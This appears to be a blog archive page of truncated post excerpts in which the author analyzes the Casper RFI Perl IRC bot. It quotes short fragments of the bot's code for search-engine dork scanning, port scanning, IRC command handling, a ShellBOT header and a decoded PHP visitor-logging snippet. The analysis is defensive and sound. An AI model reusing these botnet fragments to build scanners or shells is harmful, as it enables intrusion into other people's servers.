September 26, 2010 12:50 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl botWhat this appears to be looking for is more machines to exploit, big surprise!
I followed it back for a bit and this is what I ended up with.
sub se_yahoo {
my ($chan,$key,$nf) = @_;
sub s_engine {
my ($f,$se,$type,$chan,$bug,$dork,$ef) = @_;
sub s_cari {
#Type: 1 = Cari...
September 26, 2010 12:23 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl botOne more script listed at the top of the main one.
$filebotscan = "scan.txt";
It's full of all sorts of stuff nothing really caught my attention until I reached this.
##[ GOOGLE ]##
sub se_google {
my ($chan,$key,$nf) = @_;
my @daftar;
my $num = 50; my $max = 5000; my...
September 25, 2010 9:21 PM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl botThere is a few more things that are worth looking at.
if ($funcarg =~ /^portscan (.*)/) {
my $hostip="$1";
my...
September 16, 2010 10:05 PM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl botSo what is going on next,
my $line_temp;
while( 1 ) {
while (!(keys(%irc_servers))) { conectar("$nick", "$servidor", "$porta"); }
delete($irc_servers{''}) if (defined($irc_servers{''}));
&DCC::connections;
my @ready = $sel_cliente->can_read(0.6);
next...
September 15, 2010 10:14 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl botOk we have a couple more to go through.
Next is;
$filebotperl = "iso.txt";
I love comments, at least we don't have to guess what this is for.
#!/usr/bin/perl
#
# ShellBOT by: devil__
# Greetz: Puna, Kelserific
# Comandos:
# @oldpack <ip>...
September 9, 2010 9:10 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl botThe next on the list is
$filebotphp = "bot.txt";
This looks pretty specific to the irc bot, but there is something encoded again just like in the other scripts.
$dc_source =...
August 27, 2010 1:14 PM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl botSo it looks like sh.txt is all about shell access, wow what a surprise!
The next item is def.txt, there is not a whole lot in there beside the defacement message, so we are going to move on.
The next item is a tar.gz, psy.tar.gz. Let's unpack it and look around.
It's from a project...
August 27, 2010 11:59 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl botWe have one more to decode, $shell_data
$shell_data = "$visitcount = $HTTP_COOKIE_VARS["visits"];
if( $visitcount == "") {
$visitcount = 0;
$visitor = $_SERVER["REMOTE_ADDR"];
$web = $_SERVER["HTTP_HOST"];
$inj = $_SERVER["REQUEST_URI"];
$target =...
August 27, 2010 8:48 AM
Posted by: Dan O'Connor
casper bot,
casper rfi perl bot,
perl bot,
www perl botAt first I was thinking that these might be encrypted, but that did not turn out to be the case.
The first one we found was...
